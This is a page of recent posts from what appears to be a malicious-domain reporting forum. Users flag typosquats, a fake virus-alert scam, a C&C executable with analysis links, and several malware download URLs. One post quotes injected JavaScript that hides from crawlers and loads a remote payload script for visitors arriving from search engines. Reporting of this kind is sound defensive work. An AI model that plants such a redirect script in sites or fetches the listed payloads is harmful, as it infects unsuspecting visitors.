Recent Posts

Pages: 1 ... 4 5 [6] 7 8 ... 10
51
Malicious Domains / ausbildung-passgenau.de – a potpourri of badware!
« Last post by neeklamy on March 15, 2016, 09:47:18 pm »
There’s a few subdomains at ausbildung-passgenau.de that have pages that if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.

Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
  • fullfilescenter.ausbildung-passgenau.de
  • newfiles2016.ausbildung-passgenau.de
  • fastwindows2016.ausbildung-passgenau.de
This Google search results page will show any of the links in action: https://www.google.co.uk/search?q=site:ausbildung-passgenau.de

This is the JavaScript doing the dirty work:

Code: [Select]
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
  || (ref.indexOf("google.") > 0)
  || ref.indexOf("rambler.") > 0
  || ref.indexOf("bing.") > 0
  || ref.indexOf("mail.") > 0
  || ref.indexOf("yahoo.") > 0
  || ref.indexOf("msn.") > 0
  || ref.indexOf("live.") > 0
  || ref.indexOf("vk.") > 0
  || showme == 'force') {
    document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
  }
}
</script>
52
Malicious Domains / YouTubee.com
« Last post by ehea617 on March 05, 2016, 04:57:12 am »
http://youtubee.com/ YouTube typosquatting. Sometimes redirects to malicious domains.
53
Malicious Domains / Re: C&C Server and .exe with it
« Last post by SysAdMini on March 04, 2016, 04:26:56 pm »
In this particular case you can report abuse at http://nevergreen.net/report_file.html

For C&C domains you can contact domain registrars. Abuse contact can usually be found in whois details.

http://whois.domaintools.com/oaspodpaskdjnghzatrffgcasetfrd.cf
54
Malicious Domains / Re: C&C Server and .exe with it
« Last post by Sicqas on March 04, 2016, 03:54:11 pm »
Ah okay, tought because of the Malware it would fit it another better.

How can i report these Domains that they get locked?
55
Malicious Domains / Re: C&C Server and .exe with it
« Last post by SysAdMini on March 04, 2016, 03:52:58 pm »
Wrong forum?

It fits perfectly here.
56
Malicious Domains / Re: C&C Server and .exe with it
« Last post by Sicqas on March 04, 2016, 02:42:44 pm »
Okay, sorry didn't known it.
Oh just realised i'm in the wrong Forum, can someone move this?

Another Analyis: https://www.hybrid-analysis.com/sample/e543e7e5fca52d68be705badecbab53b03ad9be6785a451066d4b5637efcbc20?environmentId=1

+ Domain: kioioqrieuj7t451453fcgasdvgb.cf
57
Malicious Domains / Re: C&C Server and .exe with it
« Last post by SysAdMini on March 04, 2016, 01:55:15 pm »
Thanks for submission and welcome to MDL!

Please make sure to post malicious urls in a way they can't be clicked accidentally, for example by replacing http by hxxp.
58
Malicious Domains / C&C Server and .exe with it
« Last post by Sicqas on March 04, 2016, 01:38:50 pm »
I recently got a Direct Link of a EXE containing Malware. (C&C)

Here's the Link to the Deepviz Analysis:

Currently Scanning.

And the Link to Virustotal:

https://www.virustotal.com/en/file/e543e7e5fca52d68be705badecbab53b03ad9be6785a451066d4b5637efcbc20/analysis/1456258716/

The Domain is:

hxxp://oaspodpaskdjnghzatrffgcasetfrd.cf/
And some more.

Malwr Analysis: (currently Scanning)

https://malwr.com/analysis/MDM0YjZhYWJhMjc1NDc3NmFkOWEzMDc3ODRiYTU4MzA/

Download Link:

hxxp://nevergreen.net/6ob

Hope you will block all the Domains!

Thanks.
59
Malicious Domains / Windows Fake Virus/Malware
« Last post by WiFilter on March 02, 2016, 06:18:34 am »
http://gamma01.website/au0103/new_blue1_283/

This site claims that my computer has been compromised. It claims that my bank, credit card and facebook details may have been compromised and I have to call a certain number to rectify the issue.
60
Malicious Domains / Re: soundclou.com - dangerous exploit installer/typosquatter
« Last post by BenENichols on February 25, 2016, 07:57:56 am »
Blacklist them anyway, its still a scam, a con, a phish attempt.
Pages: 1 ... 4 5 [6] 7 8 ... 10